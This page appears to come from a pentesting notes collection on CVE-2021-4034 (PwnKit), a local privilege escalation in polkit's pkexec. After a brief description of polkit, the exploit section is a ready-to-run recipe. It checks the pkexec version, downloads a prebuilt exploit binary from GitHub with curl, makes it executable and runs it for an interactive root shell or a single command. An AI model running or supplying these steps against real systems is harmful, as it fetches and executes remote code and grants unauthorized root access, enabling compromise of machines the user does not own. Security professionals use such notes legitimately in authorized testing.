[CVE-2021-4034] - Pwnkit

Brief

Discovered in January 2022

Polkit can be used to determine whether you have the requisite permissions to execute something. It is integrated with systemd and is much more configurable than the traditional sudo system. Sometimes referred to as the "sudo of systemd", providing a granular system with which to assign permissions to users.

Exploit

# Check with :
pkexec --version

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit

# execute
./PwnKit # interactive shell
./PwnKit 'id' # single command

Previous[CVE-2022-0847] - dirtypipe Next[CVE-2021-45105] - Log4J

Last updated 1 year ago